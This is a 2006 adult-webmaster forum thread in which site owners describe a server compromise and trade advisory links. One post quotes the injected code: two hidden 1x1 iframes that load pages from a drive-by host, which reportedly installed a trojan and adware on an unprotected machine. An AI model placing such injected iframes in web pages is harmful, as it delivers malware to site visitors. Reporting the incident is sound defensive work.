GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Any of you have your sites hit with the Megacount exploit (https://gfy.com/showthread.php?t=662884)

Machete_ 10-05-2006 11:05 AM
Any of you have your sites hit with the Megacount exploit
 
Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware

bl4h 10-05-2006 11:09 AM
you fail as a webmaster

Trixxxia 10-05-2006 11:12 AM
Quote:
Originally Posted by ebus_dk
Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware
Can you hit me up? I'd like to see what it's doing :)

Machete_ 10-05-2006 11:16 AM
Quote:
Originally Posted by bl4h
you fail as a webmaster
It was a virtual account, and the whole server got exploited

Machete_ 10-05-2006 11:20 AM
Quote:
Originally Posted by TopBucksTrixxxia
Can you hit me up? I'd like to see what it's doing :)

it included this

PHP Code:
<iframe src='http://megacount.net/adv/new.php?adv=167' width=1 height=1></iframe
<iframe src='http://megacount.net/adv/167/new.php' width=1 height=1></iframe

boneprone 10-09-2006 03:17 PM
Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099

Machete_ 10-09-2006 03:33 PM
Quote:
Originally Posted by boneprone (Post 11033941)
Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099
dissipate posted these two pretty usefull links
http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Im my case (webair hosted) it was through cpanel


All times are GMT -7. The time now is 02:13 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2026, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123